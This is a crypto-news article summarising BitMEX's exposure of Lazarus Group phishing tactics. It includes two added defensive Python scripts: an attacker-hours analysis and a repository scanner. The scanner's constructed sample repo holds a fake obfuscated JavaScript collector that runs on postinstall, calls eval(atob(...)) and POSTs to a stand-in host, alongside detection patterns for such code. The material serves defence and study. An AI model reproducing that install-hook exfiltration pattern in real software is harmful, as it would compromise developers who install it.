BitMEX Strikes Back: Exposes Lazarus Group’s Crypto Hacking Tactics


BitMEX has published a comprehensive report on its official blog, exposing the tactics used by North Korea’s infamous Lazarus Group in recent cyberattacks targeting the crypto exchange and its employees. Known for its high-profile crypto heists, the Lazarus Group has employed increasingly deceptive strategies, including impersonating legitimate projects to run phishing campaigns and deliver malware.


Phishing Attempt Triggers Counteroffensive

The exchange’s latest investigation was prompted after a BitMEX employee was contacted on LinkedIn with a proposal to join a fake NFT project. The approach was a ploy to deliver malicious code via a seemingly benign Next.js/React GitHub repository. Rather than taking the bait, BitMEX engineers dissected the code and found it was designed to trick employees into running malicious scripts on their own systems.

Real-Time Threat Intel Uncovered

The phishing link led BitMEX researchers to a Supabase database tied to Lazarus Group operations. This exposed valuable metadata including usernames, hostnames, operating systems, geolocation, timestamps, and IP addresses of affected devices. By analyzing patterns in the data, researchers could distinguish between test environments and actual developer systems.

One notable discovery came when a Lazarus developer inadvertently exposed their real IP address—located in Jiaxing, China—despite using a VPN. The slip, which revealed a China Mobile IP, was labeled by BitMEX as a significant operational failure that could aid in unmasking the hacker’s identity.

Organizational Structure and Hacker Hierarchy Revealed

BitMEX’s analysis went beyond identifying vulnerabilities—it offered rare insight into the internal structure of the Lazarus Group. Researchers observed that phishing operations were typically assigned to lower-tier or novice hackers, while more complex tasks, such as post-exploitation actions, were handled by more advanced members. Mistakes made by junior operatives were key to uncovering vital information.

One example involved a botched reuse of a malware tool named “BeaverTail.” Improper implementation nearly exposed another hacker’s real IP address, further suggesting a skill gap among the attackers.

Tracking Lazarus by the Clock

Researchers also mapped the attackers’ operational hours, noting that activity sharply declined between 8 a.m. and 1 p.m. UTC—corresponding to 5 p.m. to 10 p.m. Pyongyang time. The consistency of this pattern implies a regimented work schedule within the Lazarus organization.
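The two analyses described above, working from exposed telemetry to separate lab machines from real victims and then mapping attacker working hours, can be reproduced in a few lines. The script below is an added example, not BitMEX's tooling: the telemetry records are constructed (hostnames, usernames and IPs are hypothetical), and the "test host" heuristic is an assumed naming-based check standing in for whatever pattern analysis the report actually used.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

PYONGYANG = timezone(timedelta(hours=9))  # Pyongyang is UTC+9

# Constructed sample telemetry mimicking the fields the report lists
# (username, hostname, OS, IP, timestamp). Hypothetical values only.
ACTIVE_UTC_HOURS = [13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23,
                    0, 1, 2, 3, 4, 5, 6, 7]
SAMPLE_RECORDS = [
    {"username": "dev", "hostname": f"dev-laptop-{i % 3}", "os": "macOS",
     "ip": f"203.0.113.{i % 5 + 1}",
     "ts": f"2025-05-{10 + i % 3:02d}T{h:02d}:{(i * 7) % 60:02d}:00Z"}
    for i, h in enumerate(ACTIVE_UTC_HOURS * 2)
] + [
    # one record that looks like the operators' own test VM
    {"username": "test", "hostname": "vm-test-01", "os": "Windows",
     "ip": "198.51.100.7", "ts": "2025-05-11T03:15:00Z"},
]


def parse_ts(ts):
    """Parse an ISO-8601 UTC timestamp ending in 'Z' into an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def is_probable_test_host(rec):
    """Assumed heuristic: lab/test naming marks an attacker test box,
    not a real developer system. Real triage would combine more signals."""
    markers = ("test", "vm-", "sandbox", "lab")
    name = f"{rec['hostname']} {rec['username']}".lower()
    return any(m in name for m in markers)


def hourly_activity(records, tz=timezone.utc):
    """Count records per hour of day in the given timezone (all 24 hours present)."""
    counts = Counter({h: 0 for h in range(24)})
    for r in records:
        counts[parse_ts(r["ts"]).astimezone(tz).hour] += 1
    return counts


def quietest_window(counts, width):
    """Return (start_hour, total) of the contiguous `width`-hour window
    with the least activity, wrapping around midnight."""
    best_start, best_total = None, None
    for start in range(24):
        total = sum(counts[(start + k) % 24] for k in range(width))
        if best_total is None or total < best_total:
            best_start, best_total = start, total
    return best_start, best_total


def local_window(start_utc, width, tz=PYONGYANG):
    """Translate a UTC window [start, start+width) into local wall-clock hours."""
    offset = int(tz.utcoffset(None).total_seconds() // 3600)
    return (start_utc + offset) % 24, (start_utc + offset + width) % 24


if __name__ == "__main__":
    victims = [r for r in SAMPLE_RECORDS if not is_probable_test_host(r)]
    counts = hourly_activity(victims)
    start, total = quietest_window(counts, width=5)
    lo, hi = local_window(start, 5)
    print(f"{len(SAMPLE_RECORDS) - len(victims)} probable test host(s) excluded")
    print(f"Quietest 5h window: {start:02d}:00-{(start + 5) % 24:02d}:00 UTC "
          f"({lo:02d}:00-{hi:02d}:00 Pyongyang), {total} events")
```

On the constructed data the quiet window lands at 08:00-13:00 UTC, which the script reports as 17:00-22:00 Pyongyang time, the same translation the report makes. With real telemetry the width of the window is something to sweep rather than fix, and the distribution should be checked on several days before reading it as a work schedule.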

Leveraging JavaScript Deobfuscation Tools

A key breakthrough in the investigation came from deobfuscating heavily obfuscated JavaScript used in the malware. BitMEX’s team used tools like Webcrack to rename variables and analyze malicious functions. They found new components designed to log victim device data and transmit it to Supabase, a database the attackers often left unsecured.

By scripting automated scans of Supabase databases, BitMEX could track operational slip-ups in real time and identify vulnerabilities in the Lazarus infrastructure.
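A defender facing the lure described in this report (a stranger's Next.js/React repository and obfuscated JavaScript that phones home) wants a quick triage pass before anyone runs `npm install`. The scanner below is an added example and not BitMEX's code: it walks a repository snapshot for the obfuscation and exfiltration indicators a reviewer would look for (dynamic `eval`, hex-escaped strings, base64 blobs, high-entropy literals, hardcoded remote URLs, `child_process`) and lists npm lifecycle hooks in `package.json`. The sample repository contents are constructed, and the assumption that the lure relies on install hooks is the author's here, not a claim from the report.

```python
import math
import re
from collections import Counter

# Heuristic indicators chosen for this example (not BitMEX's detection rules).
INDICATORS = {
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\(|\bFunction\s*\(\s*['\"]"),
    "base64_decode": re.compile(r"\batob\s*\(|Buffer\.from\s*\([^)]*['\"]base64['\"]"),
    "hex_escaped_strings": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    "child_process": re.compile(r"child_process"),
    "remote_url": re.compile(r"https?://[^\s'\"`]+"),
}
# Quoted literals of 32+ chars without escapes; checked for entropy below.
STRING_LITERAL = re.compile(r"'([^'\\\n]{32,})'|\"([^\"\\\n]{32,})\"")
JS_EXTENSIONS = (".js", ".jsx", ".ts", ".tsx", ".mjs", ".cjs")
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed sample repository: one clean page, one obfuscated collector,
# and a package.json that runs the collector on install. Hypothetical content.
SAMPLE_REPO = {
    "pages/index.js": (
        "export default function Home() {\n"
        "  return <main>Hello from a clean Next.js page</main>;\n"
        "}\n"
    ),
    "lib/telemetry.js": (
        "const _0x1a2b = ['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x63\\x6f'];\n"
        "const key = 'aB3$kL9#mQ2@pR7!wX5%zC8^vF1&hJ4*nT6(yD0)';\n"
        "eval(atob('" + "QUFB" * 30 + "'));\n"
        "fetch('https://example.invalid/ingest', {method: 'POST'});\n"
    ),
    "package.json": (
        '{"name": "nft-demo", "scripts": {"dev": "next dev", '
        '"postinstall": "node lib/telemetry.js"}}'
    ),
}


def shannon_entropy(s):
    """Bits per character; random-looking keys/payloads score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_source(text, entropy_threshold=4.5):
    """Return the list of indicator names that fire on one source file."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    for m in STRING_LITERAL.finditer(text):
        literal = m.group(1) or m.group(2)
        if shannon_entropy(literal) > entropy_threshold:
            hits.append("high_entropy_literal")
            break
    return hits


def lifecycle_scripts(package_json_text):
    """Scripts npm runs automatically during install, keyed by hook name."""
    import json
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def triage_repo(files):
    """Scan every JS/TS file in a {path: content} snapshot."""
    return {path: scan_source(src) for path, src in files.items()
            if path.endswith(JS_EXTENSIONS)}


def risk_level(hits):
    """Coarse rating: three or more indicators on one file is worth a human look."""
    return "high" if len(hits) >= 3 else "medium" if hits else "low"


if __name__ == "__main__":
    for path, hits in triage_repo(SAMPLE_REPO).items():
        print(f"{path}: {risk_level(hits)} {hits}")
    hooks = lifecycle_scripts(SAMPLE_REPO["package.json"])
    print("install hooks:", hooks or "none")
```

The indicators are deliberately noisy: a legitimate Next.js project will have remote URLs and may bundle minified code, so the output is a reading list for a reviewer (and a reason to open the repository in a disposable VM, as the report's engineers effectively did), not a verdict. An install hook that executes a file which also trips the obfuscation checks is the combination that should stop the `npm install`.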

Raising the Cybersecurity Bar

BitMEX emphasized that its discoveries are not just reactive but proactive. Based on the findings, the exchange has implemented enhanced internal monitoring systems capable of detecting infections and phishing attempts as they happen. This marks a strategic pivot for BitMEX toward cybersecurity leadership in the crypto industry.


Conclusion

BitMEX’s report signals a rare counteroffensive in the ongoing battle between crypto exchanges and cybercriminals. By exposing the Lazarus Group’s methods, hierarchy, and even location data, BitMEX not only deflected a potential breach but turned the tables on one of the most sophisticated hacking collectives in the world.

Disclaimer and Risk Warning
coinweck does not endorse or is responsible for any content, accuracy, quality, advertising, products, or other materials on this page. The image used in this article is for informational purposes only and is provided to us by a third party.  coinweck should not be held responsible for image copyright issues. Contact us if you have any issues or concerns. Readers should do their research before taking any actions related to the company.
